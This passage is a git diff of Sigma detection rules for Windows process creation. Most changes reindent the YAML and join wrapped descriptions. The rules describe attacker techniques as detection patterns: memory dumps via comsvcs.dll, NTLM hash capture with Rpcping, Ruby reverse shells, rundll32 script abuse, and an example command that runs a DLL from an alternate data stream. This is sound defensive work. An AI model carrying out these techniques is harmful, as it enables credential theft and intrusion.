\EXCEL.exe - \excelcnv.exe - \MSACCESS.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_paexec.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_paexec.yml index af7b628a6..c91950d3e 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_paexec.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_paexec.yml @@ -1,8 +1,8 @@ title: Renamed PAExec Execution id: c4e49831-1496-40cf-8ce1-b53f942b02f9 related: - - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b - type: obsoletes + - id: 7b0666ad-3e38-4e3d-9bab-78b06de85f7b + type: obsoletes status: test description: Detects execution of renamed version of PAExec. Often used by attackers references: @@ -22,28 +22,26 @@ detection: EventID: 4688 Channel: Security selection: - - Description: PAExec Application - - OriginalFileName: PAExec.exe - - Product|contains: PAExec - - Imphash: - - 11D40A7B7876288F919AB819CC2D9802 - - 6444f8a34e99b8f7d9647de66aabe516 - - dfd6aa3f7b2b1035b76b718f1ddc689f - - 1a6cca4d5460b1710a12dea39e4a592c - - Hashes|contains: - - IMPHASH=11D40A7B7876288F919AB819CC2D9802 - - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 - - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f - - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c + - Description: PAExec Application + - OriginalFileName: PAExec.exe + - Product|contains: PAExec + - Imphash: + - 11D40A7B7876288F919AB819CC2D9802 + - 6444f8a34e99b8f7d9647de66aabe516 + - dfd6aa3f7b2b1035b76b718f1ddc689f + - 1a6cca4d5460b1710a12dea39e4a592c + - Hashes|contains: + - IMPHASH=11D40A7B7876288F919AB819CC2D9802 + - IMPHASH=6444f8a34e99b8f7d9647de66aabe516 + - IMPHASH=dfd6aa3f7b2b1035b76b718f1ddc689f + - IMPHASH=1a6cca4d5460b1710a12dea39e4a592c filter: - - NewProcessName|endswith: \paexec.exe - - NewProcessName|startswith: C:\Windows\PAExec- + - NewProcessName|endswith: \paexec.exe + - NewProcessName|startswith: C:\Windows\PAExec- condition: process_creation and (selection and not filter) falsepositives: - Weird admins that rename their tools - - Software companies that bundle PAExec with their software and rename it, so - that it is less embarrassing - - When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" - directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]" + - Software companies that bundle PAExec with their software and rename it, so that it is less embarrassing + - When executed with the "-s" flag. PAExec will copy itself to the "C:\Windows\" directory with a different name. Usually like this "PAExec-[XXXXX]-[ComputerName]" level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml index 0157f115c..6c0d0b8c0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_pingcastle.yml @@ -1,8 +1,7 @@ title: Renamed PingCastle Binary Execution id: 2433a154-bb3d-42e4-86c3-a26bdac91c45 status: experimental -description: Detects the execution of a renamed "PingCastle" binary based on the PE - metadata fields. +description: Detects the execution of a renamed "PingCastle" binary based on the PE metadata fields. references: - https://thedfirreport.com/2023/10/30/netsupport-intrusion-results-in-domain-compromise/ - https://www.pingcastle.com/documentation/scanner/ @@ -21,36 +20,36 @@ detection: EventID: 4688 Channel: Security selection: - - OriginalFileName: - - PingCastleReporting.exe - - PingCastleCloud.exe - - PingCastle.exe - - CommandLine|contains: - - --scanner aclcheck - - --scanner antivirus - - --scanner computerversion - - --scanner foreignusers - - --scanner laps_bitlocker - - --scanner localadmin - - --scanner nullsession - - --scanner nullsession-trust - - --scanner oxidbindings - - --scanner remote - - --scanner share - - --scanner smb - - --scanner smb3querynetwork - - --scanner spooler - - --scanner startup - - --scanner zerologon - - CommandLine|contains: --no-enum-limit - - CommandLine|contains|all: - - --healthcheck - - --level Full - - CommandLine|contains|all: - - --healthcheck - - '--server ' + - OriginalFileName: + - PingCastleReporting.exe + - PingCastleCloud.exe + - PingCastle.exe + - CommandLine|contains: + - --scanner aclcheck + - --scanner antivirus + - --scanner computerversion + - --scanner foreignusers + - --scanner laps_bitlocker + - --scanner localadmin + - --scanner nullsession + - --scanner nullsession-trust + - --scanner oxidbindings + - --scanner remote + - --scanner share + - --scanner smb + - --scanner smb3querynetwork + - --scanner spooler + - --scanner startup + - --scanner zerologon + - CommandLine|contains: --no-enum-limit + - CommandLine|contains|all: + - --healthcheck + - --level Full + - CommandLine|contains|all: + - --healthcheck + - '--server ' filter_main_img: - NewProcessName|endswith: + NewProcessName|endswith: - \PingCastleReporting.exe - \PingCastleCloud.exe - \PingCastle.exe diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml index 15038549b..2ad7e4668 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_pressanykey.yml @@ -1,11 +1,10 @@ title: Visual Studio NodejsTools PressAnyKey Renamed Execution id: 65c3ca2c-525f-4ced-968e-246a713d164f related: - - id: a20391f8-76fb-437b-abc0-dba2df1952c6 - type: similar + - id: a20391f8-76fb-437b-abc0-dba2df1952c6 + type: similar status: test -description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", - which can be abused as a LOLBIN to execute arbitrary binaries +description: Detects renamed execution of "Microsoft.NodejsTools.PressAnyKey.exe", which can be abused as a LOLBIN to execute arbitrary binaries references: - https://twitter.com/mrd0x/status/1463526834918854661 - https://gist.github.com/nasbench/a989ce64cefa8081bd50cf6ad8c491b5 @@ -25,7 +24,7 @@ detection: selection: OriginalFileName: Microsoft.NodejsTools.PressAnyKey.exe filter_main_legit_name: - NewProcessName|endswith: \Microsoft.NodejsTools.PressAnyKey.exe + NewProcessName|endswith: \Microsoft.NodejsTools.PressAnyKey.exe condition: process_creation and (selection and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml index 5953ab488..142b81711 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_rundll32_dllregisterserver.yml @@ -1,12 +1,10 @@ title: Potential Renamed Rundll32 Execution id: 2569ed8c-1147-498a-9b8c-2ad3656b10ed related: - - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e - type: derived + - id: 0ba1da6d-b6ce-4366-828c-18826c9de23e + type: derived status: test -description: Detects when 'DllRegisterServer' is called in the commandline and the - image is not rundll32. This could mean that the 'rundll32' utility has been renamed - in order to avoid detection +description: Detects when 'DllRegisterServer' is called in the commandline and the image is not rundll32. This could mean that the 'rundll32' utility has been renamed in order to avoid detection references: - https://twitter.com/swisscom_csirt/status/1331634525722521602?s=20 - https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/ @@ -23,9 +21,9 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains: DllRegisterServer + CommandLine|contains: DllRegisterServer filter: - NewProcessName|endswith: \rundll32.exe + NewProcessName|endswith: \rundll32.exe condition: process_creation and (selection and not filter) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml index 25a6a6f20..8b0b3b096 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_sysinternals_procdump.yml @@ -1,11 +1,10 @@ title: Renamed ProcDump Execution id: 4a0b2c7e-7cb2-495d-8b63-5f268e7bfd67 related: - - id: 03795938-1387-481b-9f4c-3f6241e604fe - type: obsoletes + - id: 03795938-1387-481b-9f4c-3f6241e604fe + type: obsoletes status: test -description: Detects the execution of a renamed ProcDump executable often used by - attackers or malware +description: Detects the execution of a renamed ProcDump executable often used by attackers or malware references: - https://docs.microsoft.com/en-us/sysinternals/downloads/procdump author: Florian Roth (Nextron Systems) @@ -24,19 +23,18 @@ detection: selection_org: OriginalFileName: procdump selection_args_ma: - CommandLine|contains: + CommandLine|contains: - ' -ma ' - ' /ma ' selection_args_other: - CommandLine|contains: + CommandLine|contains: - ' -accepteula ' - ' /accepteula ' filter: - NewProcessName|endswith: + NewProcessName|endswith: - \procdump.exe - \procdump64.exe - condition: process_creation and ((selection_org or all of selection_args_*) and - not filter) + condition: process_creation and ((selection_org or all of selection_args_*) and not filter) falsepositives: - Procdump illegaly bundled with legitimate software - Administrators who rename binaries (should be investigated) diff --git a/sigma/builtin/process_creation/proc_creation_win_renamed_vmnat.yml b/sigma/builtin/process_creation/proc_creation_win_renamed_vmnat.yml index 460a66e35..3f4902909 100644 --- a/sigma/builtin/process_creation/proc_creation_win_renamed_vmnat.yml +++ b/sigma/builtin/process_creation/proc_creation_win_renamed_vmnat.yml @@ -1,8 +1,7 @@ title: Renamed Vmnat.exe Execution id: 7b4f794b-590a-4ad4-ba18-7964a2832205 status: test -description: Detects renamed vmnat.exe or portable version that can be used for DLL - side-loading +description: Detects renamed vmnat.exe or portable version that can be used for DLL side-loading references: - https://twitter.com/malmoeb/status/1525901219247845376 author: elhoim @@ -21,7 +20,7 @@ detection: selection: OriginalFileName: vmnat.exe filter_rename: - NewProcessName|endswith: vmnat.exe + NewProcessName|endswith: vmnat.exe condition: process_creation and (selection and not 1 of filter_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml b/sigma/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml index 91abc4d0c..31ffdcb3a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rpcping_credential_capture.yml @@ -1,8 +1,7 @@ title: Capture Credentials with Rpcping.exe id: 93671f99-04eb-4ab4-a161-70d446a84003 status: test -description: Detects using Rpcping.exe to send a RPC test connection to the target - server (-s) and force the NTLM hash to be sent in the process. +description: Detects using Rpcping.exe to send a RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. references: - https://lolbas-project.github.io/lolbas/Binaries/Rpcping/ - https://twitter.com/vysecurity/status/974806438316072960 @@ -22,24 +21,24 @@ detection: EventID: 4688 Channel: Security use_rpcping: - NewProcessName|endswith: \rpcping.exe + NewProcessName|endswith: \rpcping.exe remote_server: - CommandLine|contains: + CommandLine|contains: - -s - /s ntlm_auth: - - CommandLine|contains|all: - - -u - - NTLM - - CommandLine|contains|all: - - /u - - NTLM - - CommandLine|contains|all: - - -t - - ncacn_np - - CommandLine|contains|all: - - /t - - ncacn_np + - CommandLine|contains|all: + - -u + - NTLM + - CommandLine|contains|all: + - /u + - NTLM + - CommandLine|contains|all: + - -t + - ncacn_np + - CommandLine|contains|all: + - /t + - ncacn_np condition: process_creation and (use_rpcping and remote_server and ntlm_auth) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml b/sigma/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml index 785f711b2..1c2113081 100644 --- a/sigma/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_ruby_inline_command_execution.yml @@ -1,8 +1,7 @@ title: Ruby Inline Command Execution id: 20a5ffa1-3848-4584-b6f8-c7c7fd9f69c8 status: test -description: Detects execution of ruby using the "-e" flag. This is could be used - as a way to launch a reverse shell or execute live ruby code. +description: Detects execution of ruby using the "-e" flag. This is could be used as a way to launch a reverse shell or execute live ruby code. references: - https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet - https://www.revshells.com/ @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \ruby.exe - - OriginalFileName: ruby.exe + - NewProcessName|endswith: \ruby.exe + - OriginalFileName: ruby.exe selection_cli: - CommandLine|contains: ' -e' + CommandLine|contains: ' -e' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml index 8e5bb45f0..d8e959994 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_ads_stored_dll_execution.yml @@ -1,8 +1,7 @@ title: Potential Rundll32 Execution With DLL Stored In ADS id: 9248c7e1-2bf3-4661-a22c-600a8040b446 status: test -description: Detects execution of rundll32 where the DLL being called is stored in - an Alternate Data Stream (ADS). +description: Detects execution of rundll32 where the DLL being called is stored in an Alternate Data Stream (ADS). references: - https://lolbas-project.github.io/lolbas/Binaries/Rundll32 author: Harjot Singh, '@cyb3rjy0t' @@ -19,10 +18,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:' + # Example: + # rundll32 "C:\ads\file.txt:ADSDLL.dll",DllMain + # Note: This doesn't cover the use case where a full path for the DLL isn't used. As it requires a more expensive regex + CommandLine|re: '[Rr][Uu][Nn][Dd][Ll][Ll]32(\.[Ee][Xx][Ee])? \S+?\w:\S+?:' condition: process_creation and (all of selection_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml index 6f086a45e..49d2c3f99 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_advpack_obfuscated_ordinal_call.yml @@ -1,8 +1,7 @@ title: Suspicious Advpack Call Via Rundll32.EXE id: a1473adb-5338-4a20-b4c3-126763e2d3d3 status: experimental -description: Detects execution of "rundll32" calling "advpack.dll" with potential - obfuscated ordinal calls in order to leverage the "RegisterOCX" function +description: Detects execution of "rundll32" calling "advpack.dll" with potential obfuscated ordinal calls in order to leverage the "RegisterOCX" function references: - https://twitter.com/Hexacorn/status/1224848930795552769 - http://www.hexacorn.com/blog/2020/02/05/stay-positive-lolbins-not/ @@ -18,16 +17,16 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli_dll: - CommandLine|contains: advpack + CommandLine|contains: advpack selection_cli_ordinal: - - CommandLine|contains|all: - - '#+' - - '12' - - CommandLine|contains: '#-' + - CommandLine|contains|all: + - '#+' + - '12' + - CommandLine|contains: '#-' condition: process_creation and (all of selection_*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml index b0ab7d5c9..014fe54fc 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_by_ordinal.yml @@ -21,20 +21,20 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - ',#' - ', #' - - '.dll #' - - '.ocx #' + - '.dll #' # Sysmon removes , in its log + - '.ocx #' # HermeticWizard filter_edge: - CommandLine|contains|all: + CommandLine|contains|all: - EDGEHTML.dll - '#141' filter_vsbuild_dll: - CommandLine|contains: + CommandLine|contains: - \FileTracker32.dll,#1 - \FileTracker32.dll",#1 - \FileTracker64.dll,#1 @@ -45,8 +45,7 @@ detection: - \Tracker.exe condition: process_creation and (all of selection_* and not 1 of filter_*) falsepositives: - - False positives depend on scripts and administrative tools used in the monitored - environment + - False positives depend on scripts and administrative tools used in the monitored environment - Windows control panel elements have been identified as source (mmc) level: high ruletype: Sigma diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml index 8f6d1b795..17d6fab0f 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_inline_vbs.yml @@ -1,8 +1,7 @@ title: Suspicious Rundll32 Invoking Inline VBScript id: 1cc50f3f-1fc8-4acf-b2e9-6f172e1fdebd status: test -description: Detects suspicious process related to rundll32 based on command line - that invokes inline VBScript as seen being used by UNC2452 +description: Detects suspicious process related to rundll32 based on command line that invokes inline VBScript as seen being used by UNC2452 references: - https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware/ author: Florian Roth (Nextron Systems) @@ -19,7 +18,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32.exe - Execute - RegRead diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml index f68d24430..1799c29a1 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_installscreensaver.yml @@ -1,8 +1,7 @@ title: Rundll32 InstallScreenSaver Execution id: 15bd98ea-55f4-4d37-b09a-e7caa0fa2221 status: test -description: An attacker may execute an application as a SCR File using rundll32.exe - desk.cpl,InstallScreenSaver +description: An attacker may execute an application as a SCR File using rundll32.exe desk.cpl,InstallScreenSaver references: - https://lolbas-project.github.io/lolbas/Libraries/Desk/ - https://github.com/redcanaryco/atomic-red-team/blob/0f229c0e42bfe7ca736a14023836d65baa941ed2/atomics/T1218.011/T1218.011.md#atomic-test-13---rundll32-with-deskcpl @@ -20,10 +19,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: InstallScreenSaver + CommandLine|contains: InstallScreenSaver condition: process_creation and (all of selection_*) falsepositives: - Legitimate installation of a new screensaver diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml index 7db7ca701..abf19e8e0 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_js_runhtmlapplication.yml @@ -1,8 +1,7 @@ title: Rundll32 JS RunHTMLApplication Pattern id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 status: test -description: Detects suspicious command line patterns used when rundll32 is used to - run JavaScript code +description: Detects suspicious command line patterns used when rundll32 is used to run JavaScript code references: - http://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt author: Florian Roth (Nextron Systems) @@ -17,12 +16,12 @@ detection: EventID: 4688 Channel: Security selection1: - CommandLine|contains|all: + CommandLine|contains|all: - rundll32 - javascript - ..\..\mshtml,RunHTMLApplication selection2: - CommandLine|contains: ;document.write();GetObject("script + CommandLine|contains: ;document.write();GetObject("script condition: process_creation and (1 of selection*) falsepositives: - Unlikely diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml index 78d4ccdb8..b1d62bbe2 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_keymgr.yml @@ -1,8 +1,7 @@ title: Suspicious Key Manager Access id: a4694263-59a8-4608-a3a0-6f8d3a51664c status: test -description: Detects the invocation of the Stored User Names and Passwords dialogue - (Key Manager) +description: Detects the invocation of the Stored User Names and Passwords dialogue (Key Manager) references: - https://twitter.com/NinjaParanoid/status/1516442028963659777 author: Florian Roth (Nextron Systems) @@ -19,10 +18,10 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - keymgr - KRShowKeyMgr condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml index 727b94132..f7522168c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_mshtml_runhtmlapplication.yml @@ -1,12 +1,10 @@ title: Mshtml DLL RunHTMLApplication Abuse id: 4782eb5a-a513-4523-a0ac-f3082b26ac5c related: - - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 - type: derived + - id: 9f06447a-a33a-4cbe-a94f-a3f43184a7a3 + type: derived status: test -description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication - export to run arbitrary code via different protocol handlers (vbscript, javascript, - file, htpp...) +description: Detects suspicious command line using the "mshtml.dll" RunHTMLApplication export to run arbitrary code via different protocol handlers (vbscript, javascript, file, htpp...) references: - https://twitter.com/n1nj4sec/status/1421190238081277959 author: Nasreddine Bencherchali (Nextron Systems) @@ -21,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|contains|all: + CommandLine|contains|all: - \..\ - mshtml - RunHTMLApplication diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_no_params.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_no_params.yml index 032db1342..28445a6a3 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_no_params.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_no_params.yml @@ -1,8 +1,7 @@ title: Rundll32 Execution Without CommandLine Parameters id: 1775e15e-b61b-4d14-a1a3-80981298085a status: experimental -description: Detects suspicious start of rundll32.exe without any parameters as found - in CobaltStrike beacon activity +description: Detects suspicious start of rundll32.exe without any parameters as found in CobaltStrike beacon activity references: - https://www.cobaltstrike.com/help-opsec - https://twitter.com/ber_m1ng/status/1397948048135778309 @@ -20,7 +19,7 @@ detection: EventID: 4688 Channel: Security selection: - CommandLine|endswith: + CommandLine|endswith: - \rundll32.exe - \rundll32.exe" - \rundll32 diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml index 96ea3b4c5..95f235ef8 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_ntlmrelay.yml @@ -1,8 +1,7 @@ title: Suspicious NTLM Authentication on the Printer Spooler Service id: bb76d96b-821c-47cf-944b-7ce377864492 status: test -description: Detects a privilege elevation attempt by coercing NTLM authentication - on the Printer Spooler service +description: Detects a privilege elevation attempt by coercing NTLM authentication on the Printer Spooler service references: - https://twitter.com/med0x2e/status/1520402518685200384 - https://github.com/elastic/detection-rules/blob/dd224fb3f81d0b4bf8593c5f02a029d647ba2b2d/rules/windows/credential_access_relay_ntlm_auth_via_http_spoolss.toml @@ -21,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains|all: + CommandLine|contains|all: - C:\windows\system32\davclnt.dll,DavSetCookie - http - CommandLine|contains: + CommandLine|contains: - spoolss - srvsvc - /print/pipe/ diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml index 430df935b..a02f1e37c 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_obfuscated_ordinal_call.yml @@ -16,11 +16,11 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli: - CommandLine|contains: + CommandLine|contains: - '#+' - '#-' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml index 429b233cf..b299f123a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_parent_explorer.yml @@ -1,9 +1,7 @@ title: Rundll32 Spawned Via Explorer.EXE id: 1723e720-616d-4ddc-ab02-f7e3685a4713 status: experimental -description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. - This has been observed by variants of Raspberry Robin, as first reported by Red - Canary. +description: Detects execution of "rundll32.exe" with a parent process of Explorer.exe. This has been observed by variants of Raspberry Robin, as first reported by Red Canary. references: - https://redcanary.com/blog/raspberry-robin/ - https://thedfirreport.com/2022/09/26/bumblebee-round-two/ @@ -22,11 +20,11 @@ detection: selection_parent: ParentProcessName|endswith: \explorer.exe selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE filter_main_generic: - - CommandLine|contains: ' C:\Windows\System32\' - - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' + - CommandLine|contains: ' C:\Windows\System32\' # The space at the start is required + - CommandLine|endswith: ' -localserver 22d8c27b-47a1-48d1-ad08-7da7abd79617' # Windows 10 volume control condition: process_creation and (all of selection_* and not 1 of filter_main_*) falsepositives: - Unknown diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml index 99e4fb496..9482180e6 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_process_dump_via_comsvcs.yml @@ -1,11 +1,10 @@ title: Process Memory Dump Via Comsvcs.DLL id: 646ea171-dded-4578-8a4d-65e9822892e3 related: - - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c - type: obsoletes + - id: 09e6d5c0-05b8-4ff8-9eeb-043046ec774c + type: obsoletes status: test -description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering - multiple different techniques (ordinal, minidump function, etc.) +description: Detects a process memory dump via "comsvcs.dll" using rundll32, covering multiple different techniques (ordinal, minidump function, etc.) references: - https://twitter.com/shantanukhande/status/1229348874298388484 - https://twitter.com/pythonresponder/status/1385064506049630211?s=21 @@ -31,25 +30,25 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE - - CommandLine|contains: rundll32 + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE + - CommandLine|contains: rundll32 selection_cli_1: - CommandLine|contains|all: + CommandLine|contains|all: - comsvcs - full - CommandLine|contains: + CommandLine|contains: - '#-' - '#+' - '#24' - '24 ' - - MiniDump + - MiniDump # Matches MiniDump and MinidumpW selection_generic: - CommandLine|contains|all: + CommandLine|contains|all: - '24' - comsvcs - full - CommandLine|contains: + CommandLine|contains: - ' #' - ',#' - ', #' diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml index 08d382a8c..1df443948 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_registered_com_objects.yml @@ -20,13 +20,13 @@ detection: EventID: 4688 Channel: Security selection_img: - - NewProcessName|endswith: \rundll32.exe - - OriginalFileName: RUNDLL32.EXE + - NewProcessName|endswith: \rundll32.exe + - OriginalFileName: RUNDLL32.EXE selection_cli: - CommandLine|contains: + CommandLine|contains: - '-sta ' - '-localserver ' - CommandLine|contains|all: + CommandLine|contains|all: - '{' - '}' condition: process_creation and (all of selection_*) diff --git a/sigma/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml b/sigma/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml index 041b6efbf..30231130a 100644 --- a/sigma/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml +++ b/sigma/builtin/process_creation/proc_creation_win_rundll32_run_locations.yml @@ -19,21 +19,20 @@ detection: EventID: 4688 Channel: Security selection: - - NewProcessName|contains: - - 